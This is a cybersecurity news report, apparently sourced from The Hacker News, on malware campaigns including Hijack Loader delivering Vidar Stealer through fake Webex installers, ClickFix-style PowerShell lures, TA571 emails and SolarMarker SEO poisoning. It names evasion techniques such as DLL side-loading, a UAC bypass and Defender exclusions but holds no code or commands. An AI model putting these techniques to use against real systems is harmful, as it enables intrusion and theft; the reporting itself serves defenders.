Cybercriminals are tricking people into downloading free or pirated software to install a malware called Hijack Loader, which then deploys another malware known as Vidar Stealer.
“Trellix security researcher Ale Houspanossian said that the attackers managed to fool users into downloading password-protected archive files containing fake copies of a Cisco Webex Meetings App (ptService.exe),” Houspanossian explained in a report on Monday.
When users extracted and ran a file named “Setup.exe,” it secretly loaded the malware, leading to the execution of Vidar Stealer.
The attack begins with a RAR archive file containing an executable named “Setup.exe,” which is actually a copy of the Cisco Webex Meetings ptService module.
The campaign stands out for using DLL side-loading techniques to secretly launch Hijack Loader (also known as DOILoader or IDAT Loader). Hijack Loader then uses an AutoIt script to drop Vidar Stealer.
“The malware uses a known method to bypass User Account Control (UAC) and exploit the CMSTPLUA COM interface for gaining higher privileges,” Houspanossian added. “After gaining higher privileges, the malware added itself to Windows Defender’s exclusion list to avoid detection.
Besides using Vidar Stealer to steal sensitive credentials from web browsers, the attack also installs a cryptocurrency miner on the infected computer.
This information comes after an increase in ClearFake campaigns. These campaigns trick people into running a PowerShell script to fix a fake problem with viewing web pages, as reported by ReliaQuest last month.
The PowerShell script starts Hijack Loader, which then installs Lumma Stealer malware. Lumma Stealer can also download three more pieces of malware, including Amadey Loader, which installs the XMRig miner, and clipper malware to redirect cryptocurrency transactions to the attackers’ wallets.
“We saw Amadey downloading other malware, like a Go-based program believed to be JaskaGO,” said Proofpoint researchers Tommy Madjar, Dusty Miller, and Selena Larson.
Proofpoint also noticed another attack in mid-April 2024, called ClickFix. This attack used fake browser update alerts on compromised sites to spread Vidar Stealer using similar methods involving PowerShell code.
Another group using similar tricks in their malicious email campaigns is TA571. They send emails with HTML attachments that show an error message saying “The ‘Word Online” extension is not installed in your browser’ when opened.
The message gives two options: “How to fix” and “Auto-fix.” If the victim selects “How to fix,” a PowerShell command is copied to the clipboard with instructions to run it in a PowerShell terminal. This command installs either an MSI installer or a Visual Basic Script (VBS).
If the victim selects “Auto-fix,” they see files named “fix.msi” or “fix.vbs” in Windows Explorer, using a special protocol to display them.
No matter which option is chosen, running the MSI file installs Matanbuchus, and running the VBS file installs DarkGate.
Other versions of this campaign have also distributed NetSupport RAT, showing that the attackers keep updating their methods even though they need the user to do several steps for the attack to work.
The legitimate use of clipboard and the many ways to store malicious code, along with the fact that victims manually run the code without direct links to a file, make it hard to detect these threats,’ said Proofpoint.
“Antivirus software and EDRs struggle to inspect clipboard content, so detection and blocking need to happen before the victim sees the malicious HTML or site.”
Meanwhile, eSentire revealed a malware campaign using fake websites that look like Indeed[.]com to spread SolarMarker malware through a document claiming to offer team-building ideas.
“SolarMarker uses search engine optimization (SEO) poisoning to manipulate search results and increase the visibility of fake links,” said the Canadian cybersecurity company.
“The attackers” use of SEO tactics to direct users to malicious sites shows the importance of being cautious about clicking on search engine results, even if they seem legitimate.
Source: TheHackerNews
